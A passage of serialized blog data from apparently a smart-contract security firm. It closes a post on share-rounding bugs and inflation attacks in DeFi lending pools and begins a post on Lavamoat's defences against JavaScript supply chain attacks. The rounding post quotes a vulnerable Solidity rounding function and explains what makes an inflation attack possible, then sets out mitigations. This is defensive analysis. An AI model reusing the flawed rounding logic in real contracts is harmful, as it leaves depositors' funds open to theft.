private\n",{"type":25,"tag":216,"props":50463,"children":50464},{"class":6922,"line":7244},[50465],{"type":25,"tag":216,"props":50466,"children":50467},{"style":6936},[50468],{"type":31,"value":50469},"    pure\n",{"type":25,"tag":216,"props":50471,"children":50472},{"class":6922,"line":7257},[50473,50478,50482,50486],{"type":25,"tag":216,"props":50474,"children":50475},{"style":6973},[50476],{"type":31,"value":50477},"    returns",{"type":25,"tag":216,"props":50479,"children":50480},{"style":6964},[50481],{"type":31,"value":7016},{"type":25,"tag":216,"props":50483,"children":50484},{"style":7375},[50485],{"type":31,"value":50136},{"type":25,"tag":216,"props":50487,"children":50488},{"style":6964},[50489],{"type":31,"value":7107},{"type":25,"tag":216,"props":50491,"children":50492},{"class":6922,"line":7275},[50493],{"type":25,"tag":216,"props":50494,"children":50495},{"style":6964},[50496],{"type":31,"value":14836},{"type":25,"tag":216,"props":50498,"children":50499},{"class":6922,"line":7296},[50500,50504,50509,50513],{"type":25,"tag":216,"props":50501,"children":50502},{"style":6973},[50503],{"type":31,"value":20947},{"type":25,"tag":216,"props":50505,"children":50506},{"style":6964},[50507],{"type":31,"value":50508}," _maxSharePrice ",{"type":25,"tag":216,"props":50510,"children":50511},{"style":6953},[50512],{"type":31,"value":12528},{"type":25,"tag":216,"props":50514,"children":50515},{"style":6936},[50516],{"type":31,"value":50517}," true\n",{"type":25,"tag":216,"props":50519,"children":50520},{"class":6922,"line":7305},[50521,50526,50531,50535],{"type":25,"tag":216,"props":50522,"children":50523},{"style":6953},[50524],{"type":31,"value":50525},"        ?",{"type":25,"tag":216,"props":50527,"children":50528},{"style":6964},[50529],{"type":31,"value":50530}," _product % _pseudo ",{"type":25,"tag":216,"props":50532,"children":50533},{"style":6953},[50534],{"type":31,"value":12528},{"type":25,"tag":216,"props":50536,"children":50537},{"style":6989},[50538],{"type":31,"value":28236},{"type":25,"tag":216,"props":50540,"children":50541},{"class":6922,"line":7557},[50542,50547,50552,50556],{"type":25,"tag":216,"props":50543,"children":50544},{"style":6953},[50545],{"type":31,"value":50546},"            ?",{"type":25,"tag":216,"props":50548,"children":50549},{"style":6964},[50550],{"type":31,"value":50551}," _product ",{"type":25,"tag":216,"props":50553,"children":50554},{"style":6953},[50555],{"type":31,"value":5755},{"type":25,"tag":216,"props":50557,"children":50558},{"style":6964},[50559],{"type":31,"value":50560}," _pseudo\n",{"type":25,"tag":216,"props":50562,"children":50563},{"class":6922,"line":7574},[50564,50569,50573,50577,50582,50586],{"type":25,"tag":216,"props":50565,"children":50566},{"style":6953},[50567],{"type":31,"value":50568},"            :",{"type":25,"tag":216,"props":50570,"children":50571},{"style":6964},[50572],{"type":31,"value":50551},{"type":25,"tag":216,"props":50574,"children":50575},{"style":6953},[50576],{"type":31,"value":5755},{"type":25,"tag":216,"props":50578,"children":50579},{"style":6964},[50580],{"type":31,"value":50581}," _pseudo ",{"type":25,"tag":216,"props":50583,"children":50584},{"style":6953},[50585],{"type":31,"value":3539},{"type":25,"tag":216,"props":50587,"children":50588},{"style":6989},[50589],{"type":31,"value":23402},{"type":25,"tag":216,"props":50591,"children":50592},{"class":6922,"line":7591},[50593,50598,50602,50606],{"type":25,"tag":216,"props":50594,"children":50595},{"style":6953},[50596],{"type":31,"value":50597},"        :",{"type":25,"tag":216,"props":50599,"children":50600},{"style":6964},[50601],{"type":31,"value":50551},{"type":25,"tag":216,"props":50603,"children":50604},{"style":6953},[50605],{"type":31,"value":5755},{"type":25,"tag":216,"props":50607,"children":50608},{"style":6964},[50609],{"type":31,"value":50610}," _pseudo;\n",{"type":25,"tag":216,"props":50612,"children":50613},{"class":6922,"line":7604},[50614],{"type":25,"tag":216,"props":50615,"children":50616},{"style":6964},[50617],{"type":31,"value":7874},{"type":25,"tag":38,"props":50619,"children":50620},{},[50621,50626],{"type":25,"tag":64,"props":50622,"children":50623},{},[50624],{"type":31,"value":50625},"Regardless of which way the share rounding occurs, this is a bug",{"type":31,"value":50627},". The correct way would be to do calculations in units of shares and force users to withdraw in increments of shares (and then round down the tokens ultimately received in the end).",{"type":25,"tag":38,"props":50629,"children":50630},{},[50631],{"type":31,"value":50632},"This is a really tricky invariant to reason about!",{"type":25,"tag":26,"props":50634,"children":50636},{"id":50635},"root-cause",[50637],{"type":31,"value":50638},"Root Cause",{"type":25,"tag":38,"props":50640,"children":50641},{},[50642],{"type":31,"value":50643},"Even though this sort of exploit seems pervasive, it requires quite a lot of factors to be exploitable.",{"type":25,"tag":38,"props":50645,"children":50646},{},[50647],{"type":31,"value":50648},"Most importantly, the share value needs to be inflatable. Usually, this requires an integer representation for both shares and tokens. The conversion rate also needs to be expressed in terms of the shares and tokens as opposed to being stored separately.",{"type":25,"tag":206,"props":50650,"children":50652},{"className":8423,"code":50651,"language":8422,"meta":7,"style":7},"totalDepositShares * _amount / pseudoTotalPool\n",[50653],{"type":25,"tag":82,"props":50654,"children":50655},{"__ignoreMap":7},[50656],{"type":25,"tag":216,"props":50657,"children":50658},{"class":6922,"line":6923},[50659,50664,50668,50673,50677],{"type":25,"tag":216,"props":50660,"children":50661},{"style":6964},[50662],{"type":31,"value":50663},"totalDepositShares ",{"type":25,"tag":216,"props":50665,"children":50666},{"style":6953},[50667],{"type":31,"value":8519},{"type":25,"tag":216,"props":50669,"children":50670},{"style":6964},[50671],{"type":31,"value":50672}," _amount ",{"type":25,"tag":216,"props":50674,"children":50675},{"style":6953},[50676],{"type":31,"value":5755},{"type":25,"tag":216,"props":50678,"children":50679},{"style":6964},[50680],{"type":31,"value":50681}," pseudoTotalPool\n",{"type":25,"tag":38,"props":50683,"children":50684},{},[50685],{"type":31,"value":50686},"The second critical requirement is a generally empty pool. Inflating the share value means that all other shares also rise in value. If there are shares that are not controlled by the attacker, this would mean giving other users free money, almost definitely stopping inflation attacks.",{"type":25,"tag":38,"props":50688,"children":50689},{},[50690,50692,50696],{"type":31,"value":50691},"Finally, there must be improper rounding or accounting. This last requirement is generally easiest to satisfy. Share rounding is a new attack vector, and people haven't thought carefully about proper treatment of dust. Have you analyzed ",{"type":25,"tag":64,"props":50693,"children":50694},{},[50695],{"type":31,"value":23877},{"type":31,"value":50697}," integer division?",{"type":25,"tag":26,"props":50699,"children":50701},{"id":50700},"mitigations",[50702],{"type":31,"value":50703},"Mitigations",{"type":25,"tag":38,"props":50705,"children":50706},{},[50707],{"type":31,"value":50708},"The easiest way to prevent this attack is to prevent share values from being manipulated. An unexpectedly high share value can lead to denial of service scenarios and is probably worth mitigating by itself.",{"type":25,"tag":38,"props":50710,"children":50711},{},[50712,50714,50721],{"type":31,"value":50713},"The best way is to ensure that the pool has some amount of deposits on deployment, whether operationally or programmatically. As ",{"type":25,"tag":162,"props":50715,"children":50718},{"href":50716,"rel":50717},"https://twitter.com/danielvf/status/1746306320553152615",[166],[50719],{"type":31,"value":50720},"@danielvf notes",{"type":31,"value":50722},", protocols like Uniswap burn a portion of the initial deposit for this very reason.",{"type":25,"tag":206,"props":50724,"children":50726},{"className":8423,"code":50725,"language":8422,"meta":7,"style":7},"if (_totalSupply == 0) {\n    liquidity = Math.sqrt(amount0.mul(amount1)).sub(MINIMUM_LIQUIDITY);\n   _mint(address(0), MINIMUM_LIQUIDITY); // permanently lock the first MINIMUM_LIQUIDITY tokens\n} else {\n",[50727],{"type":25,"tag":82,"props":50728,"children":50729},{"__ignoreMap":7},[50730,50754,50801,50835],{"type":25,"tag":216,"props":50731,"children":50732},{"class":6922,"line":6923},[50733,50737,50742,50746,50750],{"type":25,"tag":216,"props":50734,"children":50735},{"style":6973},[50736],{"type":31,"value":19537},{"type":25,"tag":216,"props":50738,"children":50739},{"style":6964},[50740],{"type":31,"value":50741}," (_totalSupply ",{"type":25,"tag":216,"props":50743,"children":50744},{"style":6953},[50745],{"type":31,"value":12528},{"type":25,"tag":216,"props":50747,"children":50748},{"style":6989},[50749],{"type":31,"value":6992},{"type":25,"tag":216,"props":50751,"children":50752},{"style":6964},[50753],{"type":31,"value":18761},{"type":25,"tag":216,"props":50755,"children":50756},{"class":6922,"line":6769},[50757,50762,50766,50771,50776,50781,50786,50791,50796],{"type":25,"tag":216,"props":50758,"children":50759},{"style":6964},[50760],{"type":31,"value":50761},"    liquidity ",{"type":25,"tag":216,"props":50763,"children":50764},{"style":6953},[50765],{"type":31,"value":266},{"type":25,"tag":216,"props":50767,"children":50768},{"style":6964},[50769],{"type":31,"value":50770}," Math.",{"type":25,"tag":216,"props":50772,"children":50773},{"style":7047},[50774],{"type":31,"value":50775},"sqrt",{"type":25,"tag":216,"props":50777,"children":50778},{"style":6964},[50779],{"type":31,"value":50780},"(amount0.",{"type":25,"tag":216,"props":50782,"children":50783},{"style":7047},[50784],{"type":31,"value":50785},"mul",{"type":25,"tag":216,"props":50787,"children":50788},{"style":6964},[50789],{"type":31,"value":50790},"(amount1)).",{"type":25,"tag":216,"props":50792,"children":50793},{"style":7047},[50794],{"type":31,"value":50795},"sub",{"type":25,"tag":216,"props":50797,"children":50798},{"style":6964},[50799],{"type":31,"value":50800},"(MINIMUM_LIQUIDITY);\n",{"type":25,"tag":216,"props":50802,"children":50803},{"class":6922,"line":6778},[50804,50809,50813,50817,50821,50825,50830],{"type":25,"tag":216,"props":50805,"children":50806},{"style":7047},[50807],{"type":31,"value":50808},"   _mint",{"type":25,"tag":216,"props":50810,"children":50811},{"style":6964},[50812],{"type":31,"value":1850},{"type":25,"tag":216,"props":50814,"children":50815},{"style":7375},[50816],{"type":31,"value":36603},{"type":25,"tag":216,"props":50818,"children":50819},{"style":6964},[50820],{"type":31,"value":1850},{"type":25,"tag":216,"props":50822,"children":50823},{"style":6989},[50824],{"type":31,"value":1882},{"type":25,"tag":216,"props":50826,"children":50827},{"style":6964},[50828],{"type":31,"value":50829},"), MINIMUM_LIQUIDITY); ",{"type":25,"tag":216,"props":50831,"children":50832},{"style":6927},[50833],{"type":31,"value":50834},"// permanently lock the first MINIMUM_LIQUIDITY tokens\n",{"type":25,"tag":216,"props":50836,"children":50837},{"class":6922,"line":7005},[50838,50843,50847],{"type":25,"tag":216,"props":50839,"children":50840},{"style":6964},[50841],{"type":31,"value":50842},"} ",{"type":25,"tag":216,"props":50844,"children":50845},{"style":6973},[50846],{"type":31,"value":7268},{"type":25,"tag":216,"props":50848,"children":50849},{"style":6964},[50850],{"type":31,"value":7241},{"type":25,"tag":38,"props":50852,"children":50853},{},[50854,50856,50863],{"type":31,"value":50855},"Alternatively, ",{"type":25,"tag":162,"props":50857,"children":50860},{"href":50858,"rel":50859},"https://github.com/SynonymFinance/smart-contracts-public/blob/759c6afe45720e26d731f081dfc747787ad7ae20/evm/src/contracts/lendingHub/HubInterestUtilities.sol#L52-L53",[166],[50861],{"type":31,"value":50862},"storing the conversion rate separately",{"type":31,"value":50864}," can also suffice. A key factor is that depositing additional tokens or burning shares affects the conversion rate. If the conversion rate is hardcoded and updated only during interest accrual, there's nothing to manipulate.",{"type":25,"tag":206,"props":50866,"children":50868},{"className":8423,"code":50867,"language":8422,"meta":7,"style":7},"accrualIndices.borrowed = accrualIndices.borrowed * borrowInterestFactor / precision;\naccrualIndices.deposited = accrualIndices.deposited * depositInterestFactor / precision;\n",[50869],{"type":25,"tag":82,"props":50870,"children":50871},{"__ignoreMap":7},[50872,50907],{"type":25,"tag":216,"props":50873,"children":50874},{"class":6922,"line":6923},[50875,50880,50884,50889,50893,50898,50902],{"type":25,"tag":216,"props":50876,"children":50877},{"style":6964},[50878],{"type":31,"value":50879},"accrualIndices.borrowed ",{"type":25,"tag":216,"props":50881,"children":50882},{"style":6953},[50883],{"type":31,"value":266},{"type":25,"tag":216,"props":50885,"children":50886},{"style":6964},[50887],{"type":31,"value":50888}," accrualIndices.borrowed ",{"type":25,"tag":216,"props":50890,"children":50891},{"style":6953},[50892],{"type":31,"value":8519},{"type":25,"tag":216,"props":50894,"children":50895},{"style":6964},[50896],{"type":31,"value":50897}," borrowInterestFactor ",{"type":25,"tag":216,"props":50899,"children":50900},{"style":6953},[50901],{"type":31,"value":5755},{"type":25,"tag":216,"props":50903,"children":50904},{"style":6964},[50905],{"type":31,"value":50906}," precision;\n",{"type":25,"tag":216,"props":50908,"children":50909},{"class":6922,"line":6769},[50910,50915,50919,50924,50928,50933,50937],{"type":25,"tag":216,"props":50911,"children":50912},{"style":6964},[50913],{"type":31,"value":50914},"accrualIndices.deposited ",{"type":25,"tag":216,"props":50916,"children":50917},{"style":6953},[50918],{"type":31,"value":266},{"type":25,"tag":216,"props":50920,"children":50921},{"style":6964},[50922],{"type":31,"value":50923}," accrualIndices.deposited ",{"type":25,"tag":216,"props":50925,"children":50926},{"style":6953},[50927],{"type":31,"value":8519},{"type":25,"tag":216,"props":50929,"children":50930},{"style":6964},[50931],{"type":31,"value":50932}," depositInterestFactor ",{"type":25,"tag":216,"props":50934,"children":50935},{"style":6953},[50936],{"type":31,"value":5755},{"type":25,"tag":216,"props":50938,"children":50939},{"style":6964},[50940],{"type":31,"value":50906},{"type":25,"tag":38,"props":50942,"children":50943},{},[50944],{"type":31,"value":50945},"We also want to note some general takeaways:",{"type":25,"tag":38,"props":50947,"children":50948},{},[50949,50951,50956],{"type":31,"value":50950},"Invariant testing is overhyped, but is quite applicable here. Instead of attempting to reason about effects after a state change, ",{"type":25,"tag":64,"props":50952,"children":50953},{},[50954],{"type":31,"value":50955},"apply the state changes and check the invariant",{"type":31,"value":179},{"type":25,"tag":38,"props":50958,"children":50959},{},[50960],{"type":31,"value":50961},"From a protocol design perspective, users are withdrawing shares, not tokens. This is an important distinction. Your accounting logic should reason in terms of shares when possible.",{"type":25,"tag":38,"props":50963,"children":50964},{},[50965],{"type":31,"value":50966},"And finally, correct rounding behavior should still be accounted for, even if it doesn't seem impactful.",{"type":25,"tag":26,"props":50968,"children":50969},{"id":32892},[50970],{"type":31,"value":22907},{"type":25,"tag":38,"props":50972,"children":50973},{},[50974],{"type":31,"value":50975},"Rounding forces protocol developers to think carefully about dust. It's not always enough to round against the user. While initially this seems like a novel, scary attack vector, much of the impact can be mitigated operationally.",{"type":25,"tag":38,"props":50977,"children":50978},{},[50979],{"type":31,"value":50980},"As a final exercise to the reader: what is the correct rounding behavior during liquidations?",{"type":25,"tag":9316,"props":50982,"children":50983},{},[50984],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":50986},[50987,50988,50989,50993,50994,50995],{"id":32975,"depth":6769,"text":32978},{"id":49909,"depth":6769,"text":49912},{"id":50028,"depth":6769,"text":50031,"children":50990},[50991,50992],{"id":50039,"depth":6778,"text":50042},{"id":50077,"depth":6778,"text":50080},{"id":50635,"depth":6769,"text":50638},{"id":50700,"depth":6769,"text":50703},{"id":32892,"depth":6769,"text":22907},"content:blog:2024-01-18-rounding-bugs.md","blog/2024-01-18-rounding-bugs.md","blog/2024-01-18-rounding-bugs",{"_path":51000,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":51001,"description":51002,"author":51003,"image":51004,"date":51006,"isFeatured":16,"onBlogPage":16,"body":51007,"_type":6798,"_id":54486,"_source":6800,"_file":54487,"_stem":54488,"_extension":6803},"/blog/2024-06-10-supply-chain-attacks-a-new-era","Supply Chain Attacks: A New Era","Unpacking Lavamoat and how it fights supply chain attacks in Web3. We spill the beans on some sneaky bypasses, illustrating just how tricky it is to lock down JavaScript ecosystems.",[35163,35162],{"src":51005},"/posts/supply-chain-attacks-a-new-era/header.jpg","2024-06-10",{"type":22,"children":51008,"toc":54465},[51009,51013,51034,51039,51043,51048,51087,51093,51108,51126,51131,51136,51141,51154,51461,51487,51500,51505,51510,51524,51529,51542,51556,51787,51808,51843,51849,51854,51859,52073,52094,52100,52112,52202,52224,52260,52268,52286,52543,52569,52575,52589,52787,52806,53213,53226,53232,53251,53344,53349,53355,53368,53381,53467,53473,53485,53569,53581,53594,53600,53605,53619,53946,53951,53956,53962,53988,54043,54063,54116,54122,54127,54146,54157,54351,54357,54380,54386,54391,54404,54409,54414,54418,54423,54431,54461],{"type":25,"tag":26,"props":51010,"children":51011},{"id":22916},[51012],{"type":31,"value":22919},{"type":25,"tag":38,"props":51014,"children":51015},{},[51016,51023,51025,51032],{"type":25,"tag":162,"props":51017,"children":51020},{"href":51018,"rel":51019},"https://www.cloudflare.com/it-it/learning/security/what-is-a-supply-chain-attack/",[166],[51021],{"type":31,"value":51022},"Supply chain",{"type":31,"value":51024}," attacks are becoming ",{"type":25,"tag":162,"props":51026,"children":51029},{"href":51027,"rel":51028},"https://www.bleepingcomputer.com/news/security/ledger-dapp-supply-chain-attack-steals-600k-from-crypto-wallets/",[166],[51030],{"type":31,"value":51031},"increasingly popular in Web3",{"type":31,"value":51033},". In response, Lavamoat has emerged as a robust defense mechanism against supply chain attacks, offering sophisticated isolation and access control features. These help ensure that malicious dependencies cannot execute harmful code.",{"type":25,"tag":38,"props":51035,"children":51036},{},[51037],{"type":31,"value":51038},"In this article, we will explore how each component of Lavamoat works, and dive into the various bypasses we reported.",{"type":25,"tag":606,"props":51040,"children":51041},{"id":32975},[51042],{"type":31,"value":32978},{"type":25,"tag":38,"props":51044,"children":51045},{},[51046],{"type":31,"value":51047},"It is important to note that there are three different versions of LavaMoat:",{"type":25,"tag":6711,"props":51049,"children":51050},{},[51051,51063,51075],{"type":25,"tag":2043,"props":51052,"children":51053},{},[51054,51061],{"type":25,"tag":162,"props":51055,"children":51058},{"href":51056,"rel":51057},"https://github.com/LavaMoat/LavaMoat/tree/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/browserify",[166],[51059],{"type":31,"value":51060},"Lavamoat Browserify",{"type":31,"value":51062}," serves as a bundle packer. This helps organize and package JavaScript code for frontend deployment.",{"type":25,"tag":2043,"props":51064,"children":51065},{},[51066,51073],{"type":25,"tag":162,"props":51067,"children":51070},{"href":51068,"rel":51069},"https://github.com/LavaMoat/LavaMoat/tree/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/node",[166],[51071],{"type":31,"value":51072},"NodeJS Lavamoat",{"type":31,"value":51074}," is a variant of Lavamoat tailored specifically for Node.js environments.",{"type":25,"tag":2043,"props":51076,"children":51077},{},[51078,51085],{"type":25,"tag":162,"props":51079,"children":51082},{"href":51080,"rel":51081},"https://github.com/LavaMoat/LavaMoat/tree/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/allow-scripts",[166],[51083],{"type":31,"value":51084},"Lavamoat allow-scripts",{"type":31,"value":51086}," are used to prevent malicious code execution on lifecycle scripts.",{"type":25,"tag":606,"props":51088,"children":51090},{"id":51089},"lavamoats-security-features",[51091],{"type":31,"value":51092},"Lavamoat's Security Features",{"type":25,"tag":38,"props":51094,"children":51095},{},[51096,51098,51106],{"type":31,"value":51097},"The three most important features of Lavamoat",{"type":25,"tag":19431,"props":51099,"children":51100},{},[51101],{"type":25,"tag":162,"props":51102,"children":51104},{"href":33584,"ariaDescribedBy":51103,"dataFootnoteRef":7,"id":33586},[19438],[51105],{"type":31,"value":184},{"type":31,"value":51107}," are:",{"type":25,"tag":2039,"props":51109,"children":51110},{},[51111,51116,51121],{"type":25,"tag":2043,"props":51112,"children":51113},{},[51114],{"type":31,"value":51115},"Policy Files",{"type":25,"tag":2043,"props":51117,"children":51118},{},[51119],{"type":31,"value":51120},"NPM Anti Hijacking",{"type":25,"tag":2043,"props":51122,"children":51123},{},[51124],{"type":31,"value":51125},"Scuttling",{"type":25,"tag":38,"props":51127,"children":51128},{},[51129],{"type":31,"value":51130},"Let's go over them one by one.",{"type":25,"tag":630,"props":51132,"children":51134},{"id":51133},"policy-files",[51135],{"type":31,"value":51115},{"type":25,"tag":38,"props":51137,"children":51138},{},[51139],{"type":31,"value":51140},"Policy files are one important feature of Lavamoat, as they limit access to the potentially dangeorus platform API and Globals.",{"type":25,"tag":38,"props":51142,"children":51143},{},[51144,51146,51153],{"type":31,"value":51145},"For example, take the ",{"type":25,"tag":162,"props":51147,"children":51150},{"href":51148,"rel":51149},"https://github.com/MetaMask/snaps/blob/c5ddd897734f900f459c66a91f3334e76903825c/packages/snaps-execution-environments/lavamoat/browserify/iframe/policy.json#L77",[166],[51151],{"type":31,"value":51152},"Metamask Snap policy file",{"type":31,"value":1472},{"type":25,"tag":206,"props":51155,"children":51157},{"className":35325,"code":51156,"language":35327,"meta":7,"style":7},"   \"@metamask/providers\": {\n      \"globals\": {\n        \"Event\": true,\n        \"addEventListener\": true,\n        \"chrome.runtime.connect\": true,\n        \"console\": true,\n        \"dispatchEvent\": true,\n        \"document.createElement\": true,\n        \"document.readyState\": true,\n        \"ethereum\": \"write\",\n        \"location.hostname\": true,\n        \"removeEventListener\": true,\n        \"web3\": true\n      },\n      \"packages\": {\n        \"@metamask/object-multiplex\": true,\n        \"@metamask/providers>@metamask/safe-event-emitter\": true\n",[51158],{"type":25,"tag":82,"props":51159,"children":51160},{"__ignoreMap":7},[51161,51173,51188,51208,51227,51247,51267,51287,51307,51327,51348,51368,51387,51403,51410,51425,51445],{"type":25,"tag":216,"props":51162,"children":51163},{"class":6922,"line":6923},[51164,51169],{"type":25,"tag":216,"props":51165,"children":51166},{"style":8205},[51167],{"type":31,"value":51168},"   \"@metamask/providers\"",{"type":25,"tag":216,"props":51170,"children":51171},{"style":6964},[51172],{"type":31,"value":40985},{"type":25,"tag":216,"props":51174,"children":51175},{"class":6922,"line":6769},[51176,51180,51184],{"type":25,"tag":216,"props":51177,"children":51178},{"style":8205},[51179],{"type":31,"value":40993},{"type":25,"tag":216,"props":51181,"children":51182},{"style":6947},[51183],{"type":31,"value":1472},{"type":25,"tag":216,"props":51185,"children":51186},{"style":6964},[51187],{"type":31,"value":7241},{"type":25,"tag":216,"props":51189,"children":51190},{"class":6922,"line":6778},[51191,51196,51200,51204],{"type":25,"tag":216,"props":51192,"children":51193},{"style":8205},[51194],{"type":31,"value":51195},"        \"Event\"",{"type":25,"tag":216,"props":51197,"children":51198},{"style":6947},[51199],{"type":31,"value":1472},{"type":25,"tag":216,"props":51201,"children":51202},{"style":6936},[51203],{"type":31,"value":16425},{"type":25,"tag":216,"props":51205,"children":51206},{"style":6964},[51207],{"type":31,"value":7465},{"type":25,"tag":216,"props":51209,"children":51210},{"class":6922,"line":7005},[51211,51215,51219,51223],{"type":25,"tag":216,"props":51212,"children":51213},{"style":8205},[51214],{"type":31,"value":41045},{"type":25,"tag":216,"props":51216,"children":51217},{"style":6947},[51218],{"type":31,"value":1472},{"type":25,"tag":216,"props":51220,"children":51221},{"style":6936},[51222],{"type":31,"value":16425},{"type":25,"tag":216,"props":51224,"children":51225},{"style":6964},[51226],{"type":31,"value":7465},{"type":25,"tag":216,"props":51228,"children":51229},{"class":6922,"line":7110},[51230,51235,51239,51243],{"type":25,"tag":216,"props":51231,"children":51232},{"style":8205},[51233],{"type":31,"value":51234},"        \"chrome.runtime.connect\"",{"type":25,"tag":216,"props":51236,"children":51237},{"style":6947},[51238],{"type":31,"value":1472},{"type":25,"tag":216,"props":51240,"children":51241},{"style":6936},[51242],{"type":31,"value":16425},{"type":25,"tag":216,"props":51244,"children":51245},{"style":6964},[51246],{"type":31,"value":7465},{"type":25,"tag":216,"props":51248,"children":51249},{"class":6922,"line":7216},[51250,51255,51259,51263],{"type":25,"tag":216,"props":51251,"children":51252},{"style":8205},[51253],{"type":31,"value":51254},"        \"console\"",{"type":25,"tag":216,"props":51256,"children":51257},{"style":6947},[51258],{"type":31,"value":1472},{"type":25,"tag":216,"props":51260,"children":51261},{"style":6936},[51262],{"type":31,"value":16425},{"type":25,"tag":216,"props":51264,"children":51265},{"style":6964},[51266],{"type":31,"value":7465},{"type":25,"tag":216,"props":51268,"children":51269},{"class":6922,"line":7244},[51270,51275,51279,51283],{"type":25,"tag":216,"props":51271,"children":51272},{"style":8205},[51273],{"type":31,"value":51274},"        \"dispatchEvent\"",{"type":25,"tag":216,"props":51276,"children":51277},{"style":6947},[51278],{"type":31,"value":1472},{"type":25,"tag":216,"props":51280,"children":51281},{"style":6936},[51282],{"type":31,"value":16425},{"type":25,"tag":216,"props":51284,"children":51285},{"style":6964},[51286],{"type":31,"value":7465},{"type":25,"tag":216,"props":51288,"children":51289},{"class":6922,"line":7257},[51290,51295,51299,51303],{"type":25,"tag":216,"props":51291,"children":51292},{"style":8205},[51293],{"type":31,"value":51294},"        \"document.createElement\"",{"type":25,"tag":216,"props":51296,"children":51297},{"style":6947},[51298],{"type":31,"value":1472},{"type":25,"tag":216,"props":51300,"children":51301},{"style":6936},[51302],{"type":31,"value":16425},{"type":25,"tag":216,"props":51304,"children":51305},{"style":6964},[51306],{"type":31,"value":7465},{"type":25,"tag":216,"props":51308,"children":51309},{"class":6922,"line":7275},[51310,51315,51319,51323],{"type":25,"tag":216,"props":51311,"children":51312},{"style":8205},[51313],{"type":31,"value":51314},"        \"document.readyState\"",{"type":25,"tag":216,"props":51316,"children":51317},{"style":6947},[51318],{"type":31,"value":1472},{"type":25,"tag":216,"props":51320,"children":51321},{"style":6936},[51322],{"type":31,"value":16425},{"type":25,"tag":216,"props":51324,"children":51325},{"style":6964},[51326],{"type":31,"value":7465},{"type":25,"tag":216,"props":51328,"children":51329},{"class":6922,"line":7296},[51330,51335,51339,51344],{"type":25,"tag":216,"props":51331,"children":51332},{"style":8205},[51333],{"type":31,"value":51334},"        \"ethereum\"",{"type":25,"tag":216,"props":51336,"children":51337},{"style":6947},[51338],{"type":31,"value":1472},{"type":25,"tag":216,"props":51340,"children":51341},{"style":8205},[51342],{"type":31,"value":51343}," \"write\"",{"type":25,"tag":216,"props":51345,"children":51346},{"style":6964},[51347],{"type":31,"value":7465},{"type":25,"tag":216,"props":51349,"children":51350},{"class":6922,"line":7305},[51351,51356,51360,51364],{"type":25,"tag":216,"props":51352,"children":51353},{"style":8205},[51354],{"type":31,"value":51355},"        \"location.hostname\"",{"type":25,"tag":216,"props":51357,"children":51358},{"style":6947},[51359],{"type":31,"value":1472},{"type":25,"tag":216,"props":51361,"children":51362},{"style":6936},[51363],{"type":31,"value":16425},{"type":25,"tag":216,"props":51365,"children":51366},{"style":6964},[51367],{"type":31,"value":7465},{"type":25,"tag":216,"props":51369,"children":51370},{"class":6922,"line":7557},[51371,51375,51379,51383],{"type":25,"tag":216,"props":51372,"children":51373},{"style":8205},[51374],{"type":31,"value":41145},{"type":25,"tag":216,"props":51376,"children":51377},{"style":6947},[51378],{"type":31,"value":1472},{"type":25,"tag":216,"props":51380,"children":51381},{"style":6936},[51382],{"type":31,"value":16425},{"type":25,"tag":216,"props":51384,"children":51385},{"style":6964},[51386],{"type":31,"value":7465},{"type":25,"tag":216,"props":51388,"children":51389},{"class":6922,"line":7574},[51390,51395,51399],{"type":25,"tag":216,"props":51391,"children":51392},{"style":8205},[51393],{"type":31,"value":51394},"        \"web3\"",{"type":25,"tag":216,"props":51396,"children":51397},{"style":6947},[51398],{"type":31,"value":1472},{"type":25,"tag":216,"props":51400,"children":51401},{"style":6936},[51402],{"type":31,"value":50517},{"type":25,"tag":216,"props":51404,"children":51405},{"class":6922,"line":7591},[51406],{"type":25,"tag":216,"props":51407,"children":51408},{"style":6964},[51409],{"type":31,"value":41162},{"type":25,"tag":216,"props":51411,"children":51412},{"class":6922,"line":7604},[51413,51417,51421],{"type":25,"tag":216,"props":51414,"children":51415},{"style":8205},[51416],{"type":31,"value":41170},{"type":25,"tag":216,"props":51418,"children":51419},{"style":6947},[51420],{"type":31,"value":1472},{"type":25,"tag":216,"props":51422,"children":51423},{"style":6964},[51424],{"type":31,"value":7241},{"type":25,"tag":216,"props":51426,"children":51427},{"class":6922,"line":7613},[51428,51433,51437,51441],{"type":25,"tag":216,"props":51429,"children":51430},{"style":8205},[51431],{"type":31,"value":51432},"        \"@metamask/object-multiplex\"",{"type":25,"tag":216,"props":51434,"children":51435},{"style":6947},[51436],{"type":31,"value":1472},{"type":25,"tag":216,"props":51438,"children":51439},{"style":6936},[51440],{"type":31,"value":16425},{"type":25,"tag":216,"props":51442,"children":51443},{"style":6964},[51444],{"type":31,"value":7465},{"type":25,"tag":216,"props":51446,"children":51447},{"class":6922,"line":7636},[51448,51453,51457],{"type":25,"tag":216,"props":51449,"children":51450},{"style":8205},[51451],{"type":31,"value":51452},"        \"@metamask/providers>@metamask/safe-event-emitter\"",{"type":25,"tag":216,"props":51454,"children":51455},{"style":6947},[51456],{"type":31,"value":1472},{"type":25,"tag":216,"props":51458,"children":51459},{"style":6936},[51460],{"type":31,"value":50517},{"type":25,"tag":38,"props":51462,"children":51463},{},[51464,51465,51470,51472,51477,51479,51485],{"type":31,"value":474},{"type":25,"tag":82,"props":51466,"children":51468},{"className":51467},[],[51469],{"type":31,"value":41235},{"type":31,"value":51471}," section in a LavaMoat policy specifies which global variables and properties a module can access, setting permissions for its global scope interactions. Similarly, the ",{"type":25,"tag":82,"props":51473,"children":51475},{"className":51474},[],[51476],{"type":31,"value":41243},{"type":31,"value":51478}," section outlines the module's dependencies and the permissions or trust relationships with those dependencies. This defines how ",{"type":25,"tag":82,"props":51480,"children":51482},{"className":51481},[],[51483],{"type":31,"value":51484},"@metamask/providers",{"type":31,"value":51486}," interacts with other packages.",{"type":25,"tag":38,"props":51488,"children":51489},{},[51490,51492,51498],{"type":31,"value":51491},"To enforce these policies, LavaMoat uses ",{"type":25,"tag":82,"props":51493,"children":51495},{"className":51494},[],[51496],{"type":31,"value":51497},"lavapack",{"type":31,"value":51499},", a custom webpack that wraps ever dependency and applies the specified rules independently.",{"type":25,"tag":630,"props":51501,"children":51503},{"id":51502},"npm-anti-hijacking",[51504],{"type":31,"value":51120},{"type":25,"tag":38,"props":51506,"children":51507},{},[51508],{"type":31,"value":51509},"One important note is that Lavamoat can't rely solely on the names of the packages as they are published on NPM. Otherwise, a malicious actor could create a package with the same name as a 